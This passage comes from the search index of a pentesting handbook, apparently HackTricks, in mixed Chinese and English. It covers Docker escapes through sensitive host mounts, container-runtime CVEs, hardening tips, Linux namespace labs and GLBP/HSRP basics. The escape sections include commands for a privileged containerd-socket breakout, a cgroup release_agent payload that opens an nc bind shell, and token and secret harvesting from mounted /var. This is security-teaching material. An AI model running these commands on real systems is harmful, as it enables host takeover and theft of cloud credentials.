\'s/.*\\\\perdir=(\\\\[^,]\\\\_).\\\\*/\\\\1/p\' /etc/mtab) #### Sets uevent_helper to malicious helper echo \\"$host_path/evil-helper\\" > /sys/kernel/uevent_helper #### Triggers a uevent echo change > /sys/class/mem/null/uevent #### Reads the output cat /output 
/sys/class/thermal Controls temperature settings, potentially causing DoS attacks or physical damage. /sys/kernel/vmcoreinfo Leaks kernel addresses, potentially compromising KASLR. /sys/kernel/security Houses securityfs interface, allowing configuration of Linux Security Modules like AppArmor. Access might enable a container to disable its MAC system. /sys/firmware/efi/vars and /sys/firmware/efi/efivars Exposes interfaces for interacting with EFI variables in NVRAM. Misconfiguration or exploitation can lead to bricked laptops or unbootable host machines. /sys/kernel/debug debugfs offers a \\"no rules\\" debugging interface to the kernel. History of security issues due to its unrestricted nature.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » /sys 漏洞","id":"1658","title":"/sys 漏洞"},"1659":{"body":"The host\'s /var folder contains container runtime sockets and the containers\' filesystems. If this folder is mounted inside a container, that container will get read-write access to other containers\' file systems with root privileges. This can be abused to pivot between containers, to cause a denial of service, or to backdoor other containers and applications that run in them. 
Kubernetes If a container like this is deployed with Kubernetes: yaml apiVersion: v1 kind: Pod metadata: name: pod-mounts-var labels: app: pentest spec: containers: - name: pod-mounts-var-folder image: alpine volumeMounts: - mountPath: /host-var name: noderoot command: [ \\"/bin/sh\\", \\"-c\\", \\"--\\" ] args: [ \\"while true; do sleep 30; done;\\" ] volumes: - name: noderoot hostPath: path: /var Inside the pod-mounts-var-folder container: bash / # find /host-var/ -type f -iname \'*.env*\' 2>/dev/null /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/201/fs/usr/src/app/.env.example\\n\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/135/fs/docker-entrypoint.d/15-local-resolvers.envsh / # cat /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/105/fs/usr/src/app/.env.example | grep -i secret\\nJWT_SECRET=85da0\\nREFRESH_TOKEN_SECRET=14ea / # find /host-var/ -type f -iname \'index.html\' 2>/dev/null\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/57/fs/usr/src/app/node_modules/@mapbox/node-pre-gyp/lib/util/nw-pre-gyp/index.html\\n\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index.html\\n/host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/132/fs/usr/share/nginx/html/index.html / # echo \'\' > /host-var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/140/fs/usr/share/nginx/html/index2.html The XSS was achieved: Stored XSS via mounted /var folder Note that the container DOES NOT require a restart or anything. Any changes made via the mounted /var folder will be applied instantly. You can also replace configuration files, binaries, services, application files, and shell profiles to achieve automatic (or semi-automatic) RCE. 
Access to cloud credentials The container can read K8s serviceaccount tokens or AWS webidentity tokens which allows the container to gain unauthorized access to K8s or cloud: bash / # find /host-var/ -type f -iname \'*token*\' 2>/dev/null | grep kubernetes.io\\n/host-var/lib/kubelet/pods/21411f19-934c-489e-aa2c-4906f278431e/volumes/kubernetes.io~projected/kube-api-access-64jw2/..2025_01_22_12_37_42.4197672587/token\\n\\n/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/kube-api-access-bljdj/..2025_01_22_12_17_53.265458487/token\\n/host-var/lib/kubelet/pods/01c671a5-aaeb-4e0b-adcd-1cacd2e418ac/volumes/kubernetes.io~projected/aws-iam-token/..2025_01_22_03_45_56.2328221474/token\\n/host-var/lib/kubelet/pods/5fb6bd26-a6aa-40cc-abf7-ecbf18dde1f6/volumes/kubernetes.io~projected/kube-api-access-fm2t6/..2025_01_22_12_25_25.3018586444/token Docker The exploitation in Docker (or in Docker Compose deployments) is exactly the same, except that usually the other containers\' filesystems are available under a different base path: bash $ docker info | grep -i \'docker root\\\\|storage driver\'\\n存储驱动: overlay2\\nDocker 根目录: /var/lib/docker So the filesystems are under /var/lib/docker/overlay2/: bash $ sudo ls -la /var/lib/docker/overlay2 drwx--x--- 4 root root 4096 1月 9 22:14 00762bca8ea040b1bb28b61baed5704e013ab23a196f5fe4758dafb79dfafd5d\\ndrwx--x--- 4 root root 4096 1月 11 17:00 03cdf4db9a6cc9f187cca6e98cd877d581f16b62d073010571e752c305719496\\ndrwx--x--- 4 root root 4096 1月 9 21:23 049e02afb3f8dec80cb229719d9484aead269ae05afe81ee5880ccde2426ef4f\\ndrwx--x--- 4 root root 4096 1月 9 21:22 062f14e5adbedce75cea699828e22657c8044cd22b68ff1bb152f1a3c8a377f2\\n Note The actual paths may differ in different setups, which is why your best bet is to use the find command to locate the other containers\' filesystems and SA / web identity tokens","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation 
» Sensitive Mounts » /var Vulnerabilities","id":"1659","title":"/var Vulnerabilities"},"166":{"body":"FHRP旨在通过将多个路由器合并为一个虚拟单元来提供网络的鲁棒性,从而增强负载分配和容错能力。思科系统公司在这一套协议中引入了GLBP和HSRP等重要协议。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » Insights into FHRP","id":"166","title":"Insights into FHRP"},"1660":{"body":"Mounting certain host Unix sockets or writable pseudo-filesystems is equivalent to giving the container full root on the node. Treat the following paths as highly sensitive and never expose them to untrusted workloads : text /run/containerd/containerd.sock # containerd CRI 套接字 /var/run/crio/crio.sock # CRI-O 运行时套接字 /run/podman/podman.sock # Podman API(有根或无根) /run/buildkit/buildkitd.sock # BuildKit 守护进程(有根) /var/run/kubelet.sock # Kubernetes 节点上的 Kubelet API /run/firecracker-containerd.sock # Kata / Firecracker Attack example abusing a mounted containerd socket: bash # 在容器内(套接字挂载在 /host/run/containerd.sock)\\nctr --address /host/run/containerd.sock images pull docker.io/library/busybox:latest\\nctr --address /host/run/containerd.sock run --tty --privileged --mount \\\\\\ntype=bind,src=/,dst=/host,options=rbind:rw docker.io/library/busybox:latest host /bin/sh\\nchroot /host /bin/bash # 在主机上获得完整的 root shell A similar technique works with crictl , podman or the kubelet API once their respective sockets are exposed. Writable cgroup v1 mounts are also dangerous. If /sys/fs/cgroup is bind-mounted rw and the host kernel is vulnerable to CVE-2022-0492 , an attacker can set a malicious release_agent and execute arbitrary code in the initial namespace: bash # 假设容器具有 CAP_SYS_ADMIN 权限并且内核存在漏洞\\nmkdir -p /tmp/x && echo 1 > /tmp/x/notify_on_release echo \'/tmp/pwn\' > /sys/fs/cgroup/release_agent # 需要 CVE-2022-0492 echo -e \'#!/bin/sh\\\\nnc -lp 4444 -e /bin/sh\' > /tmp/pwn && chmod +x /tmp/pwn\\nsh -c \\"echo 0 > /tmp/x/cgroup.procs\\" # 触发 empty-cgroup 事件 When the last process leaves the cgroup, /tmp/pwn runs as root on the host . 
Patched kernels (>5.8 with commit 32a0db39f30d) validate the writer’s capabilities and block this abuse.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » Other Sensitive Host Sockets and Directories (2023-2025)","id":"1660","title":"Other Sensitive Host Sockets and Directories (2023-2025)"},"1661":{"body":"CVE-2024-21626 – runc “Leaky Vessels” file-descriptor leak runc ≤ 1.1.11 leaked an open directory file descriptor that could point to the host root. A malicious image or docker exec could start a container whose working directory is already on the host filesystem, enabling arbitrary file read/write and privilege escalation. Fixed in runc 1.1.12 (Docker ≥ 25.0.3, containerd ≥ 1.7.14). Dockerfile FROM scratch\\nWORKDIR /proc/self/fd/4 # 4 == \\"/\\" on the host leaked by the runtime\\nCMD [\\"/bin/sh\\"] CVE-2024-23651 / 23653 – BuildKit OverlayFS copy-up TOCTOU A race condition in the BuildKit snapshotter let an attacker replace a file that was about to be copied up into the container’s rootfs with a symlink to an arbitrary path on the host, gaining write access outside the build context. Fixed in BuildKit v0.12.5 / Buildx 0.12.0. Exploitation requires an untrusted docker build on a vulnerable daemon. CVE-2024-1753 – Buildah / Podman bind-mount breakout during build Buildah ≤ 1.35.0 (and Podman ≤ 4.9.3) incorrectly resolved absolute paths passed to --mount=type=bind in a Containerfile . A crafted build stage could mount / from the host read-write inside the build container when SELinux was disabled or in permissive mode, leading to full escape at build time. Patched in Buildah 1.35.1 and the corresponding Podman 4.9.4 back-port series. CVE-2024-40635 – containerd UID integer overflow Supplying a User value larger than 2147483647 in an image config overflowed the 32-bit signed integer and started the process as UID 0 inside the host user namespace. 
Workloads expected to run as non-root could therefore obtain root privileges. Fixed in containerd 1.6.38 / 1.7.27 / 2.0.4.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » Mount-Related Escape CVEs (2023-2025)","id":"1661","title":"Mount-Related Escape CVEs (2023-2025)"},"1662":{"body":"Bind-mount host paths read-only whenever possible and add nosuid,nodev,noexec mount options. Prefer dedicated side-car proxies or rootless clients instead of exposing the runtime socket directly. Keep the container runtime up-to-date (runc ≥ 1.1.12, BuildKit ≥ 0.12.5, Buildah ≥ 1.35.1 / Podman ≥ 4.9.4, containerd ≥ 1.7.27). In Kubernetes, use securityContext.readOnlyRootFilesystem: true, the restricted PodSecurity profile and avoid hostPath volumes pointing to the paths listed above.","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » Hardening Reminders (2025)","id":"1662","title":"Hardening Reminders (2025)"},"1663":{"body":"runc CVE-2024-21626 advisory Unit 42 analysis of CVE-2022-0492 https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts Understanding and Hardening Linux Containers Abusing Privileged and Unprivileged Linux Containers Buildah CVE-2024-1753 advisory containerd CVE-2024-40635 advisory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker Breakout / Privilege Escalation » Sensitive Mounts » References","id":"1663","title":"References"},"1664":{"body":"Reading time: 2 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Namespaces","id":"1664","title":"Namespaces"},"1665":{"body":"PID Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID namespace","id":"1665","title":"PID namespace"},"1666":{"body":"Mount Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Mount namespace","id":"1666","title":"Mount namespace"},"1667":{"body":"Network Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Network namespace","id":"1667","title":"Network namespace"},"1668":{"body":"IPC Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace","id":"1668","title":"IPC Namespace"},"1669":{"body":"UTS Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » UTS namespace","id":"1669","title":"UTS namespace"},"167":{"body":"思科创建的GLBP在TCP/IP协议栈上运行,使用UDP在3222端口进行通信。GLBP组中的路由器每3秒交换一次“hello”数据包。如果路由器在10秒内未发送这些数据包,则被认为是离线的。然而,这些定时器并不是固定的,可以进行修改。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP Protocol Insights","id":"167","title":"GLBP Protocol Insights"},"1670":{"body":"Time Namespace","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » Time Namespace","id":"1670","title":"Time Namespace"},"1671":{"body":"User Namespace 
tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » User namespace","id":"1671","title":"User namespace"},"1672":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » CGroup Namespace","id":"1672","title":"CGroup Namespace"},"1673":{"body":"cgroup 命名空间是一个 Linux 内核特性,提供 在命名空间内运行的进程的 cgroup 层次结构的隔离 。Cgroups,简称 控制组 ,是一个内核特性,允许将进程组织成层次组,以管理和强制 系统资源的限制 ,如 CPU、内存和 I/O。 虽然 cgroup 命名空间不是我们之前讨论的其他命名空间类型(PID、挂载、网络等),但它们与命名空间隔离的概念相关。 Cgroup 命名空间虚拟化了 cgroup 层次结构的视图 ,因此在 cgroup 命名空间内运行的进程与在主机或其他命名空间中运行的进程相比,具有不同的层次结构视图。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 基本信息","id":"1673","title":"基本信息"},"1674":{"body":"当创建一个新的 cgroup 命名空间时, 它以创建进程的 cgroup 为基础,开始查看 cgroup 层次结构 。这意味着在新的 cgroup 命名空间中运行的进程将只看到整个 cgroup 层次结构的一个子集,限制在以创建进程的 cgroup 为根的 cgroup 子树内。 在 cgroup 命名空间内的进程将 将自己的 cgroup 视为层次结构的根 。这意味着,从命名空间内进程的角度来看,它们自己的 cgroup 显示为根,并且它们无法看到或访问其自身子树之外的 cgroup。 Cgroup 命名空间并不直接提供资源的隔离; 它们仅提供 cgroup 层次结构视图的隔离 。 资源控制和隔离仍然由 cgroup 子系统(例如,cpu、内存等)本身强制执行。 有关 CGroups 的更多信息,请查看: CGroups","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 工作原理:","id":"1674","title":"工作原理:"},"1675":{"body":"","breadcrumbs":"Linux 
Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 实验:","id":"1675","title":"实验:"},"1676":{"body":"CLI bash sudo unshare -C [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离的视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 1。然后,/bin/bash 及其子进程安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,使得 /bin/bash 及其子进程能够正常运行而不会遇到内存分配错误。 Docker bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 创建不同的命名空间","id":"1676","title":"创建不同的命名空间"},"1677":{"body":"bash ls -l /proc/self/ns/cgroup\\nlrwxrwxrwx 1 root root 0 Apr 4 21:19 /proc/self/ns/cgroup -> \'cgroup:[4026531835]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 检查您的进程所在的命名空间","id":"1677","title":"检查您的进程所在的命名空间"},"1678":{"body":"bash sudo find /proc -maxdepth 3 -type l -name cgroup -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name cgroup -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 查找所有 CGroup 命名空间","id":"1678","title":"查找所有 CGroup 命名空间"},"1679":{"body":"bash nsenter -C TARGET_PID --pid 
/bin/bash 您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/cgroup)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » 进入 CGroup 命名空间","id":"1679","title":"进入 CGroup 命名空间"},"168":{"body":"GLBP的特点是通过使用单个虚拟IP和多个虚拟MAC地址在路由器之间实现负载分配。在GLBP组中,每个路由器都参与数据包转发。与HSRP/VRRP不同,GLBP通过多种机制提供真正的负载均衡: Host-Dependent Load Balancing: 为主机保持一致的AVF MAC地址分配,这对稳定的NAT配置至关重要。 Round-Robin Load Balancing: 默认方法,在请求主机之间交替分配AVF MAC地址。 Weighted Round-Robin Load Balancing: 根据预定义的“权重”指标分配负载。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » GLBP Operations and Load Distribution","id":"168","title":"GLBP Operations and Load Distribution"},"1680":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » CGroup Namespace » References","id":"1680","title":"References"},"1681":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » IPC Namespace","id":"1681","title":"IPC Namespace"},"1682":{"body":"IPC(进程间通信)命名空间是一个Linux内核特性,提供 隔离 System V IPC对象,如消息队列、共享内存段和信号量。这种隔离确保 不同IPC命名空间中的进程无法直接访问或修改彼此的IPC对象 ,为进程组之间提供额外的安全性和隐私保护。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 基本信息","id":"1682","title":"基本信息"},"1683":{"body":"当创建一个新的IPC命名空间时,它会以 完全隔离的System V IPC对象集 开始。这意味着在新的IPC命名空间中运行的进程默认无法访问或干扰其他命名空间或主机系统中的IPC对象。 在命名空间内创建的IPC对象仅对 该命名空间内的进程可见和可访问 。每个IPC对象在其命名空间内由唯一的键标识。尽管在不同命名空间中键可能相同,但对象本身是隔离的,无法跨命名空间访问。 进程可以使用setns()系统调用在命名空间之间移动,或使用带有CLONE_NEWIPC标志的unshare()或clone()系统调用创建新的命名空间。当进程移动到新命名空间或创建一个时,它将开始使用与该命名空间关联的IPC对象。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 工作原理:","id":"1683","title":"工作原理:"},"1684":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 实验:","id":"1684","title":"实验:"},"1685":{"body":"CLI bash sudo unshare -i [--mount-proc] /bin/bash 通过挂载新的 /proc 文件系统实例,如果使用参数 --mount-proc,您可以确保新的挂载命名空间具有 特定于该命名空间的进程信息的准确和隔离视图 。 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新的 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程位于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新的 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新的命名空间中成为 PID 1。/bin/bash 及其子进程随后安全地包含在这个新命名空间中,防止 PID 1 提前退出,并允许正常的 PID 分配。 通过确保 unshare 以 -f 标志运行,新的 PID 命名空间得以正确维护,允许 /bin/bash 及其子进程在不遇到内存分配错误的情况下运行。 Docker 
bash docker run -ti --name ubuntu1 -v /usr:/ubuntu1 ubuntu bash","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 创建不同的命名空间","id":"1685","title":"创建不同的命名空间"},"1686":{"body":"bash ls -l /proc/self/ns/ipc\\nlrwxrwxrwx 1 root root 0 Apr 4 20:37 /proc/self/ns/ipc -> \'ipc:[4026531839]\'","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 检查您的进程所在的命名空间","id":"1686","title":"检查您的进程所在的命名空间"},"1687":{"body":"bash sudo find /proc -maxdepth 3 -type l -name ipc -exec readlink {} \\\\; 2>/dev/null | sort -u\\n# Find the processes with an specific namespace\\nsudo find /proc -maxdepth 3 -type l -name ipc -exec ls -l {} \\\\; 2>/dev/null | grep ","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 查找所有 IPC 命名空间","id":"1687","title":"查找所有 IPC 命名空间"},"1688":{"body":"bash nsenter -i TARGET_PID --pid /bin/bash 此外,您只能 以 root 身份进入另一个进程命名空间 。并且您 不能 在没有指向它的描述符的情况下 进入 其他命名空间(例如 /proc/self/ns/net)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 进入 IPC 命名空间","id":"1688","title":"进入 IPC 命名空间"},"1689":{"body":"bash # Container\\nsudo unshare -i /bin/bash\\nipcmk -M 100\\nShared memory id: 0\\nipcs -m ------ Shared Memory Segments --------\\nkey shmid owner perms bytes nattch status\\n0x2fba9021 0 root 644 100 0 # From the host\\nipcs -m # Nothing is seen","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 创建 IPC 对象","id":"1689","title":"创建 IPC 对象"},"169":{"body":"AVG (Active Virtual Gateway): 主要路由器,负责将MAC地址分配给对等路由器。 AVF (Active Virtual Forwarder): 指定管理网络流量的路由器。 GLBP Priority: 决定AVG的指标,默认值为100,范围在1到255之间。 GLBP Weight: 反映路由器的当前负载,可以手动或通过对象跟踪进行调整。 GLBP Virtual IP Address: 作为所有连接设备的网络默认网关。 对于交互,GLBP使用保留的组播地址224.0.0.102和UDP端口3222。路由器每3秒发送一次“hello”数据包,如果在10秒内错过一个数据包,则被视为非操作状态。","breadcrumbs":"Pentesting Network » GLBP & HSRP Attacks » Key Components and Terminologies in 
GLBP","id":"169","title":"Key Components and Terminologies in GLBP"},"1690":{"body":"https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » IPC Namespace » 参考","id":"1690","title":"参考"},"1691":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » PID Namespace","id":"1691","title":"PID Namespace"},"1692":{"body":"PID(进程标识符)命名空间是Linux内核中的一个特性,通过使一组进程拥有自己独特的PID集合,与其他命名空间中的PID分开,从而提供进程隔离。这在容器化中尤为重要,因为进程隔离对于安全性和资源管理至关重要。 当创建一个新的PID命名空间时,该命名空间中的第一个进程被分配PID 1。这个进程成为新命名空间的“init”进程,负责管理该命名空间内的其他进程。在命名空间内创建的每个后续进程将拥有该命名空间内的唯一PID,这些PID将独立于其他命名空间中的PID。 从PID命名空间内进程的角度来看,它只能看到同一命名空间中的其他进程。它无法感知其他命名空间中的进程,也无法使用传统的进程管理工具(例如,kill、wait等)与它们交互。这提供了一种隔离级别,有助于防止进程相互干扰。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 基本信息","id":"1692","title":"基本信息"},"1693":{"body":"当创建一个新进程时(例如,通过使用clone()系统调用),该进程可以被分配到一个新的或现有的PID命名空间。 如果创建了一个新命名空间,该进程将成为该命名空间的“init”进程 。 内核 维护一个 新命名空间中的PID与父命名空间中相应PID之间的映射 (即,从中创建新命名空间的命名空间)。这个映射 允许内核在必要时翻译PID ,例如,在不同命名空间中的进程之间发送信号时。 PID命名空间中的进程只能看到并与同一命名空间中的其他进程交互 。它们无法感知其他命名空间中的进程,并且它们的PID在其命名空间内是唯一的。 当 PID命名空间被销毁 (例如,当命名空间的“init”进程退出时), 该命名空间内的所有进程都将被终止 
。这确保与命名空间相关的所有资源都得到妥善清理。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 工作原理:","id":"1693","title":"工作原理:"},"1694":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » Namespaces » PID Namespace » 实验:","id":"1694","title":"实验:"},"1695":{"body":"CLI bash sudo unshare -pf --mount-proc /bin/bash 错误:bash: fork: 无法分配内存 当 unshare 在没有 -f 选项的情况下执行时,由于 Linux 处理新 PID(进程 ID)命名空间的方式,会遇到错误。关键细节和解决方案如下: 问题解释 : Linux 内核允许一个进程使用 unshare 系统调用创建新的命名空间。然而,启动新 PID 命名空间创建的进程(称为 \\"unshare\\" 进程)并不会进入新的命名空间;只有它的子进程会进入。 运行 %unshare -p /bin/bash% 会在与 unshare 相同的进程中启动 /bin/bash。因此,/bin/bash 及其子进程处于原始 PID 命名空间中。 新命名空间中 /bin/bash 的第一个子进程成为 PID 1。当该进程退出时,如果没有其他进程,它会触发命名空间的清理,因为 PID 1 具有收养孤儿进程的特殊角色。然后,Linux 内核将禁用该命名空间中的 PID 分配。 后果 : 新命名空间中 PID 1 的退出导致 PIDNS_HASH_ADDING 标志的清理。这导致 alloc_pid 函数在创建新进程时无法分配新的 PID,从而产生 \\"无法分配内存\\" 的错误。 解决方案 : 通过在 unshare 中使用 -f 选项可以解决此问题。此选项使 unshare 在创建新 PID 命名空间后分叉一个新进程。 执行 %unshare -fp /bin/bash% 确保 unshare 命令本身在新命名空间中成为 PID 